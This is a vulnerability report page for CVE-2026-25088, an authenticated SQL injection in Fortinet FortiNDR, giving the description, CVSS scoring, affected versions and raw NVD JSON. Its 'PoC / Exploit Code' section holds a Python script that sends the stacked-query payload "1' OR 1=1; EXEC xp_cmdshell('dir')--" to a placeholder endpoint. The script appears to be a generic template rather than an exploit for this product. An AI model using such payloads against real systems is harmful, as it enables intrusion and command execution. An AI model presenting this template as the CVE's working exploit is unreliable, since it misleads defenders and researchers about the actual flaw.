Security Vulnerability Report
中文
CVE-2026-25088 CVSS 5.4 MEDIUM

CVE-2026-25088

Published: 2026-05-12 18:16:39
Last Modified: 2026-05-12 18:57:02
Source: [email protected]

Description

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiNDR 7.6.0 through 7.6.2, FortiNDR 7.4.0 through 7.4.9, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FortiNDR 7.6.0 - 7.6.2
FortiNDR 7.4.0 - 7.4.9
FortiNDR 7.2 (所有版本)
FortiNDR 7.1 (所有版本)
FortiNDR 7.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "https://<target-ip>" vulnerable_endpoint = "/api/some_endpoint" url = target_host + vulnerable_endpoint # Attacker credentials (Low privilege required) credentials = { "username": "attacker", "password": "password123" } # Create a session to handle authentication session = requests.Session() session.post(target_host + "/login", data=credentials) # Malicious payload to exploit SQL Injection # Example: Attempting to execute a command via stacking payload = "1' OR 1=1; EXEC xp_cmdshell('dir')--" # Inject payload into request parameters params = { "id": payload } try: # Send the crafted HTTP request response = session.get(url, params=params, verify=False, timeout=10) # Analyze response if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response body:", response.text) else: print("[-] Exploit failed or endpoint returned error.") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25088", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:39.327", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiNDR 7.6.0 through 7.6.2, FortiNDR 7.4.0 through 7.4.9, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-134", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.